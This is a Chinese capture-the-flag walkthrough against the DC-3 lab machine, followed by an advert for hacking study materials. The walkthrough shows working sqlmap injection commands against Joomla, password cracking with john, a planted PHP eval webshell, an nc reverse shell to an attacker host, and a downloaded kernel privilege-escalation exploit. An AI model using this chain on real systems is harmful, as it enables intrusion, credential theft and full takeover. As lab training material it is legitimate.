利用vm直接打开就OK了,建议设置为nat
- 信息收集
执行命令:nmap -sP -T 5 192.168.20.205/24
执行命令:nmap -A -T 5 192.168.20.205
- 爆破网站目录
- 探测joomla的脚本
无法登陆,先不爆破,去github上看看有没有探测joomla的脚本
在kali中下载https://github.com/OWASP/joomscan.git
探测网站
进入下载目录:cd /root/Downloads/joomscan-master
执行命令:perl joomscan.pl -u http://192.168.20.205
- 查询joomla版本的漏洞
查找到有SQL注入点,可以在网上百度该版本的注入点,然后可以使用sqlmap工具来跑。
- 爆破数据库:
sqlmap -u "http://192.168.20.205/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch
- 爆破数据库中数据表:
sqlmap -u "http://192.168.20.205/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch
- 爆破数据表中的列:
sqlmap -u "http://192.168.20.205/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns
- 爆破数据表用户名和密码的内容:
sqlmap -u "http://192.168.20.205/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,password --dump --batch
用户名 | 密码 |
admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
- 解密hash密码
先解压/usr/share/wordlists的字典文件
gzip -d rockyou.txt.gz
john爆破
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=bcrypt
用户名 | 密码 |
admin | snoopy |
- 通过破解的用户名和密码登录系统
是个名为joomla的内容管理系统,扫下后台
登录网站:
成功登录网站
- 利用模板漏洞,新建一句话木马
写入一句话木马,并保存。
<?php eval($_POST[cmd]);?>
在目录html下新建一句话木马,如下图所示:
- 安装中国蚁剑
将初始化选择源码包antSword目录(前面我们下载的核心源码),初始化后会自动重启,再次打开就可以使用了。
加载器:https://gitcode.net/mirrors/antswordproject/antsword-loader
核心源码路径:https://gitcode.net/mirrors/antswordproject/antsword
- 中国蚁剑连接webshell
添加一句话木马路径:http://192.168.20.205/templates/beez3/html/yjh.php
添加成功的界面:
双击连接:
新建虚拟终端:
- 在kali上开启监听,目标机器虚拟终端执行连接
kali:
nc -lvp 4444
目标:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.20.228 4444 >/tmp/f
- 收集目标设备的版本信息
lsb_release -a
uname -a
连上后,执行命令,显示发行版本信息如下:
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
$ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
- 查找目标机器的系统版本漏洞
直接搜索searchsploit
searchsploit ubuntu 16.04 4.4.x
- 下载漏洞利用poc程序
在kali上下载源码:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/39772.zip(注释:这种方式下载打不开这个压缩文件,因为它可能是rar格式的),需要通过浏览器下载,解压缩后,再重新压缩成zip格式。
- 在kali上启动web服务器:
python2.7 -m SimpleHTTPServer 80
- 在目标机器上下载poc程序
wget 192.168.20.228/39772.zip
在根目录下权限拒绝,切换到/tmp目录下
unzip 39772.zip && cd 39772 && tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit && sh compile.sh
- 系统提权
./doubleput
- 获取目标机flag
cd /root
cat the-flag.txt
这种shell终端环境不太友好,可以修改哈:
执行命令:python -c 'import pty;pty.spawn("/bin/bash")'
需要提高哈哈哈
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图 ![](https://img-blog.csdnimg.cn/direct/424e38ca2a4f4d9f8309ef122fbcf07a.png)
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取